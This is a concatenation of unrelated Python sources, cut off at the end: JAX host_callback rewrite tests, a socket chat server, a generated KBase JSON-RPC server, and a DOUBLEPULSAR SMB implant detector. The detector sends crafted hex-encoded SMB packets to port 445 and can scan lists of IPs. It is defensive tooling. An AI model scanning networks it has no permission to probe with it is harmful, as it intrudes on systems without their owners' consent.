has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = jax.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, jax.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
jax.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
detect_doublepulsar_smb.py
|
#!/usr/bin/python
import binascii
import socket
import argparse
import struct
import threading
# Packets
negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
# Arguments
parser = argparse.ArgumentParser(description="Detect present of DOUBLEPULSAR SMB implant\n\nAuthor: Luke Jennings\nWebsite: https://countercept.com\nTwitter: @countercept", formatter_class=argparse.RawTextHelpFormatter)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--ip', help='Single IP address to check')
group.add_argument('--file', help='File containing a list of IP addresses to check')
parser.add_argument('--timeout', help="Timeout on connection for socket in seconds", default=None)
parser.add_argument('--verbose', help="Verbose output for checking of commands", action='store_true')
parser.add_argument('--threads', help="Number of connection threads when checking file of IPs (default 10)", default="10")
args = parser.parse_args()
ip = args.ip
filename = args.file
timeout = args.timeout
verbose = args.verbose
num_threads = int(args.threads)
semaphore = threading.BoundedSemaphore(value=num_threads)
print_lock = threading.Lock()
def print_status(ip, message):
global print_lock
with print_lock:
print "[*] [%s] %s" % (ip, message)
def check_ip(ip):
global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
# Connect to socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(float(timeout) if timeout else None)
host = ip
port = 445
s.connect((host, port))
# Send/receive negotiate protocol request
if verbose:
print_status(ip, "Sending negotiation protocol request")
s.send(negotiate_protocol_request)
s.recv(1024)
# Send/receive session setup request
if verbose:
print_status(ip, "Sending session setup request")
s.send(session_setup_request)
session_setup_response = s.recv(1024)
# Extract user ID from session setup response
user_id = session_setup_response[32:34]
if verbose:
print_status(ip, "User ID = %s" % struct.unpack("<H", user_id)[0])
# Replace user ID in tree connect request packet
modified_tree_connect_request = list(tree_connect_request)
modified_tree_connect_request[32] = user_id[0]
modified_tree_connect_request[33] = user_id[1]
modified_tree_connect_request = "".join(modified_tree_connect_request)
# Send tree connect request
if verbose:
print_status(ip, "Sending tree connect")
s.send(modified_tree_connect_request)
tree_connect_response = s.recv(1024)
# Extract tree ID from response
tree_id = tree_connect_response[28:30]
if verbose:
print_status(ip, "Tree ID = %s" % struct.unpack("<H", tree_id)[0])
# Replace tree ID and user ID in trans2 session setup packet
modified_trans2_session_setup = list(trans2_session_setup)
modified_trans2_session_setup[28] = tree_id[0]
modified_trans2_session_setup[29] = tree_id[1]
modified_trans2_session_setup[32] = user_id[0]
modified_trans2_session_setup[33] = user_id[1]
modified_trans2_session_setup = "".join(modified_trans2_session_setup)
# Send trans2 sessions setup request
if verbose:
print_status(ip, "Sending trans2 session setup")
s.send(modified_trans2_session_setup)
final_response = s.recv(1024)
s.close()
# Check for 0x51 response to indicate DOUBLEPULSAR infection
if final_response[34] == "\x51":
with print_lock:
print "[+] [%s] DOUBLEPULSAR SMB IMPLANT DETECTED!!!" % ip
else:
with print_lock:
print "[-] [%s] No presence of DOUBLEPULSAR SMB implant" % ip
def threaded_check(ip_address):
global semaphore
try:
check_ip(ip_address)
except Exception as e:
with print_lock:
print "[ERROR] [%s] - %s" % (ip_address, e)
finally:
semaphore.release()
if ip:
check_ip(ip)
if filename:
with open(filename, "r") as fp:
for line in fp:
semaphore.acquire()
ip_address = line.strip()
t = threading.Thread(target=threaded_check, args=(ip_address,))
t.start()
|
server.py
|
from concurrent.futures import thread
import socket
# from sqlite3 import connect
import threading
#threading is an essential for creating multiple thread
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
FORMAT= 'utf-8'
DISCONNECT_MSG = "!DISCONNECT"
#SERVER = "10.252.1.144"
# print("SERVER CODE: ", socket.gethostname())
ADDR = (SERVER, PORT)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#binding to a address
server.bind(ADDR)
def handel_client(conn, addr):
print(f"=> NEW CONNECTIONS {addr} connected.")
connected = True
while connected:
msg_lenghth = conn.recv(HEADER).decode(FORMAT)
msg_lenghth = int(msg_lenghth)
msg = conn.recv(msg_lenghth).decode(FORMAT)
if msg == DISCONNECT_MSG:
connected = False
print(f"{addr} Says : {msg}")
def start():
server.listen()
print(f"=> Finding for new Connection with {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handel_client, args={conn, addr})
thread.start() # starting
print(f"=> ACTIVE CONNECTIONS {threading.activeCount() - 1 }")
print("=> INITATING SERVER")
start()
|
KBParallelTestModuleServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from KBParallelTestModule.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'KBParallelTestModule'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from KBParallelTestModule.KBParallelTestModuleImpl import KBParallelTestModule # noqa @IgnorePep8
impl_KBParallelTestModule = KBParallelTestModule(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'KBParallelTestModule'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_KBParallelTestModule.do_something,
name='KBParallelTestModule.do_something',
types=[dict])
self.method_authentication['KBParallelTestModule.do_something'] = 'required' # noqa
self.rpc_service.add(impl_KBParallelTestModule.status,
name='KBParallelTestModule.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'KBParallelTestModule ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
